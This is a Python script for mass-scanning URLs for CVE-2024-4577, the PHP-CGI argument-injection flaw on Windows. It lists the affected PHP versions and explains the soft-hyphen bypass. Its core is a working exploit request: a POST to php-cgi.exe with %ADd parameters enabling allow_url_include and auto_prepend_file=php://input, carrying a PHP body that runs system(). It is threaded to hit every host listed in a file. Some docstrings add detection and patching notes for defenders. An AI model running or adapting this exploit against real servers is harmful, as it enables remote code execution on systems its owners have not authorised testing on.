"""
* @author:程
* @DateTime:2024/7/27 16:55
"""
'''受影响版本
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29'''
'''漏洞分析
回顾CVE-2012-1823漏洞,该漏洞是用户将HTTP请求参数提交至Apache服务器,通过mod_cgi模块交给php-cgi处理,从漏洞补丁可以看出,
如果检测到字符串开头为"-"字符并且字符串不存在"="字符就设置skip_getopt = 1,
那么整个查询字符串将作为CGI的参数进行传递,攻击者可以向后端的php-cgi解析程序提交恶意数据,php-cgi会将恶意数据当做php参数直接执行。'''
import re
import requests
import socket
from concurrent.futures import ThreadPoolExecutor, as_completed
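def get_host_from_url(url):
    """
    Extract the host name from a URL.

    The optional ``http://`` / ``https://`` scheme is dropped and the host is
    the leading run of characters up to the first ``:`` or ``/``. A port is
    therefore never part of the result, whether or not a scheme is present
    (previously the port was only stripped when a scheme was given, so
    ``host:8080/`` yielded ``host:8080`` while ``http://host:8080/`` yielded
    ``host``).

    NOTE(review): bracketed IPv6 literals (``[::1]``) are not handled; the
    first character ``[`` would be returned as the host.

    Args:
    - url: URL, or a bare ``host[:port][/path]`` string, to parse

    Returns:
    - the host name, or None when no host can be found or *url* is not a
      string (the error is printed rather than raised, so a bad entry in a
      target list does not abort the whole scan)
    """
    try:
        # A trailing '/' guarantees the host segment is always terminated.
        if not url.endswith('/'):
            url += '/'
        # Drop the scheme so the authority part is at the front in both cases.
        if url.startswith(('http://', 'https://')):
            url = url.split('//', 1)[1]
        # The host ends at the first ':' (port) or '/' (path).
        match = re.match(r'[^:/]+', url)
        return match.group(0) if match else None
    except Exception as e:
        # Best-effort helper: report the problem and let the caller treat
        # None as "no host".
        print(f"无法解析主机名: {str(e)}")
        return None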
def CVE_2024_4577_test(url: str) -> str:
    """
    Probe one base URL for CVE-2024-4577 (PHP-CGI argument injection on Windows).

    The probe POSTs to ``/php-cgi/php-cgi.exe`` under *url* with a query string
    of ``%ADd`` tokens that carry php.ini overrides, and a PHP body that prints a
    fixed marker; the marker's presence in the response body is taken as
    confirmation. From the defender's side this request shape -- ``%AD``
    immediately before ``d`` in the query string of a php-cgi path, together
    with ``allow_url_include`` / ``auto_prepend_file=php://input`` -- is the
    thing to alert on in web-server and WAF logs; the affected version ranges
    are the ones listed at the top of this file, and upgrading past them is
    the fix.

    Args:
    - url: base URL of the target (scheme and host, optional path prefix)

    Returns:
    - a human-readable result message. An unresolvable host, a non-2xx/3xx
      status and any exception are all folded into the returned string;
      nothing is raised to the caller.
    """
    try:
        host = get_host_from_url(url)
        if not host:
            return f"URL: {url} 无法解析主机名"
        # Browser-like request headers. Host is the parsed host name only,
        # since get_host_from_url drops any port.
        headers: dict[str, str] = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0',
            'Host': host
        }
        # Request URI for the php-cgi binary. Each "%ADd" is expected to reach
        # php-cgi as a "-d" option (0xAD is a soft hyphen; on a vulnerable
        # Windows build it is mapped to '-'), which is how the php.ini
        # overrides in the query string get applied.
        uri = '/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'
        # NOTE(review): if *url* already ends with '/', the path contains
        # a double slash ("//php-cgi/...").
        target_url = url + uri
        # PHP body: prints a fixed marker so the response can be checked for
        # it. (The original comment mentioned an "exec_command" that does not
        # exist in this file.)
        php_code = '<?php system("echo 1234567891011121214151617181920"); ?>'
        # NOTE(review): no timeout is passed, so an unresponsive host blocks
        # this worker thread indefinitely.
        response = requests.post(target_url, headers=headers, data=php_code)
        # 2xx/3xx with the marker in the body => reported vulnerable;
        # 2xx/3xx without it => reported clean; any other status => reported
        # as a failed request.
        if response.status_code // 100 == 2 or response.status_code // 100 == 3:
            if "1234567891011121214151617181920" in response.text:
                return f"{url} 存在Windows平台PHP-CGI远程代码执行漏洞, 编号CVE_2024_4577"
            else:
                return f"{url} 未发现漏洞"
        else:
            return f"{url} 发送请求失败,状态码: {response.status_code}"
    except Exception as e:
        # Connection errors and the like become a result line instead of
        # propagating out of the thread pool.
        return f"{url} 发生异常: {str(e)}"
def batch_scan(file_path):
    """
    Scan every URL listed in *file_path* for CVE-2024-4577 and print one
    result line per URL as each probe finishes.

    Args:
    - file_path: path to a text file with one URL per line (whitespace around
      each line is stripped; blank lines are still submitted as-is)
    """
    try:
        with open(file_path, 'r') as handle:
            raw_lines = handle.readlines()
        targets = [line.strip() for line in raw_lines]
        # Ten worker threads; results are printed in completion order.
        with ThreadPoolExecutor(max_workers=10) as pool:
            pending = {}
            for target in targets:
                pending[pool.submit(CVE_2024_4577_test, target)] = target
            for finished in as_completed(pending):
                print(finished.result())
    except FileNotFoundError:
        print(f"文件 {file_path} 未找到")
    except Exception as e:
        print(f"发生异常: {str(e)}")
if __name__ == '__main__':
    # Script entry point: read the default target list and scan it.
    target_list = 'urls.txt'
    batch_scan(target_list)